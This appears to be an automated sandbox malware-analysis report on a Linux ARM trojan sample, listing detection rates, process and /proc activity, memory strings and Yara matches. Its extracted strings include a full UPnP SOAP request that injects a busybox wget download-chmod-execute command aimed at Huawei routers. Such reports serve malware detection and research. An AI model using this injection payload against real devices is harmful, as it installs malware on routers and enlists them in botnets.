Source: arm7.elf |
ReversingLabs: Detection: 57% |
Source: arm7.elf |
String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: arm7.elf |
String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/ |
Source: Initial sample |
String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g |
Source: Initial sample |
String containing 'busybox' found: -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: Initial sample |
String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: ELF static info symbol of initial sample |
.symtab present: no |
Source: classification engine |
Classification label: mal76.troj.linELF@0/0@0/0 |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6274/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6273/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6276/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6275/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6278/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6311/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6277/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6310/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6279/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6312/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6270/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6272/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6271/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6304/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6303/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6306/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6305/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6308/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6307/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6309/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6043/cmdline |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6285/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6284/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6243/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6245/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6244/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6247/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6246/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6281/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6280/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6283/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6282/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/1/cmdline |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/4334/cmdline |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6252/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6296/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6251/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6295/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6298/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6253/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6297/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6256/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6299/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6258/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6257/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6292/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6250/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6294/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6293/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6249/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6248/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6262/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6300/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6269/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6302/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6301/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6261/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6260/status |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6259/status |
Source: /usr/bin/dash (PID: 6291) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.TjQ3WJqRTx /tmp/tmp.dEkSBaCYg2 /tmp/tmp.cgax66qtsO |
Source: /usr/bin/dash (PID: 6292) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.TjQ3WJqRTx /tmp/tmp.dEkSBaCYg2 /tmp/tmp.cgax66qtsO |
Source: arm7.elf, 6217.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp, arm7.elf, 6219.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp, arm7.elf, 6230.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp, arm7.elf, 6220.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp |
Binary or memory string: U!/etc/qemu-binfmt/arm |
Source: arm7.elf, 6217.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp, arm7.elf, 6219.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp, arm7.elf, 6230.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp, arm7.elf, 6220.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp |
Binary or memory string: /etc/qemu-binfmt/arm |
Source: arm7.elf, 6217.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp, arm7.elf, 6219.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp, arm7.elf, 6230.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp, arm7.elf, 6220.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp |
Binary or memory string: /usr/bin/qemu-arm |
Source: arm7.elf, 6217.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp, arm7.elf, 6219.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp, arm7.elf, 6230.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp, arm7.elf, 6220.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp |
Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm7.elf |
Source: arm7.elf, 6230.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp |
Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped |
Source: Yara match |
File source: arm7.elf, type: SAMPLE |
Source: Yara match |
File source: 6217.1.00007f20a4017000.00007f20a402f000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6220.1.00007f20a4017000.00007f20a402f000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6219.1.00007f20a4017000.00007f20a402f000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6230.1.00007f20a4017000.00007f20a402f000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: arm7.elf PID: 6217, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: arm7.elf PID: 6219, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: arm7.elf PID: 6220, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: arm7.elf PID: 6230, type: MEMORYSTR |